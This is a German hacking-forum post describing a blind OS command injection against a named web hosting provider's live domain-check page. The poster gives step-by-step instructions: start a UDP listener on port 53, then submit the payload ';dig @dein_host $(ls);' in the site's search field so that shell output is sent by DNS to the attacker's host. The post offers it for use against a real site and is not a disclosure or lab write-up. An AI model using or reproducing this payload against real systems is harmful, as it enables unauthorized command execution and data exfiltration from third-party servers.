Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

ip-projects.de - Blind OS Command Injection

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
Zero-X

Zero-X

    FTB Experte

  • Premium Member
  • Likes
    127
  • 98 Beiträge
  • 45 Bedankt
  • Android [root]
  • Windows, Linux
URL:
https://www.ip-projects.de/webhosting-domaincheck.html

Wenn man bei dieser Seite sich die Ausgabe der Shell über den Befehl "mail" anzeigen lassen will, kann es sein, daß es sehr lange dauert bis man eine E-Mail mit dem entsprechenden Inhalt erhält und "curl ist manchmal etwas umständlich. Deswegen habe ich mir die Ausgabe der Shell über den Befehl "dig" anzeigen lassen. Dig steht für Domain Information Groper und ist ein Befehl, der dazu dient, Informationen von DNS-Servern aubzufragen.

So ist die Vorgehenseise:

Zuerst brauchen wir einen kleinen Server, der alle Anfragen, die an ihn gesendet werden protokolliert.

Diesen habe ich verwendet:

http://bansky.net/echotool/

Scan von Virustotal.com:
SHA256: e1af7723d0672d7169cd259829b743efb0b9ae297276687a063e6853aee55733
Dateiname: echotool.exe
Erkennungsrate: 0 / 53
Analyse-Datum: 2014-10-30 18:01:56 UTC


In der Kommandozeile von Windows geben wir folgendes ein:
echotool /p udp /s 53 /r 53 /l 53

Jetzt lauscht der Server nach UDP-Verbindungen auf Port 53 (Domain Name System).

Im Suchfeld der Webseite geben wir ein:

;dig @dein_host $(ls);

Wenn alles geklappt hat, sehen wir jetzt die Ausgabe des Shell-Befehls im Fenster mit der Kommandozeile.
  • White-Warti gefällt das



  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


Dieses Thema wurde von 38 Mitglied(ern) gelesen


    ¥akuza112, a8107096, akayoshi, BlackZetsu, Bornload, cooky1, Cranky, Cube, FalkE, FatalityMods, Framerater, gutzuu, Laggy, LastKingz, lion., most_uniQue, mulu, n4pst3r, nong_dan, notfound, pdr0, Phesii, pornoralle, ProHex, SepaX, smc2014, Smokyjoe, sniffer, Streetboz, Teeworst, Twix2010, ueEqlL, VeqasZ, White-Warti, XCherry, Xenio, zepsus, Zero-X
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.